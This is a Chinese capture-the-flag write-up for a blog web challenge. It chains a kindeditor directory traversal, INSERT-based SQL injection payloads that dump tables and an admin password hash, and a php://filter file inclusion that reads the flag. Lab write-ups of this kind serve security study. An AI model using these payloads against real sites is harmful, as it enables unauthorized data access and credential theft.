i春秋-Web-BLOG

一个BLOG,注册后登录,发现使用了 kindeditor 4.1.10 编辑器,这个编辑器存在目录遍历漏洞,访问 /kindeditor/php/file_manager_json.php?path=../,会泄露目录内文件。

kindeditor

发现 flag 就在网站根目录下,但是没办法访问到。

继续摸索,有个发文章的功能,存在SQL注入,INSERT型。

通过INSERT可以批量添加记录的特性,判断出当前表存在4个字段。

Payload:

title=1&content=1’,’1’),(‘aaa’,’bbb’,’ccc’) # 报错
title=1&content=1’,’1’),(‘aaa’,’bbb’,’ccc’,’ddd’) # 成功

根据回显,得出第二个字段是标题,第三个字段是内容。

开始爆数据:

  • 爆表名

    title=1&content=1’,’1’),(‘aaa’,(select group_concat(table_name) from information_schema.tables where table_schema = database()),’ccc’,’ddd’) # 得到表 [posts,users]

  • 爆字段

    title=1&content=1’,’1’),(‘aaa’,(select table_name, column_name from information_schema.columns where table_name = ‘users’ # 得到两个字段 [username,password]

  • 爆用户

    title=1&content=1’,’1’),(‘aaa’,(select group_concat(username) from users ),’ccc’,’ddd’) # 得到用户名 admin

  • 爆密码

    title=1&content=1’,’1’),(‘aaa’,(select group_concat(password) from users ),’ccc’,’ddd’) # 得到密码HASH dbb616c5d935d8f34c12c291066d6fb7,解密后 melody123

重新以 admin 身份登录,发现新的入口 /blog_manage/manager.php?module=article_manage&name=php,看链接,长得就像文件包含漏洞。

测试后,发现确实是这个问题。

构造链接, /blog_manage/manager.php?module=php://filter/read=convert.base64-encode/resource=../flag&name=php,成功读到 flag

flag

文章目录
|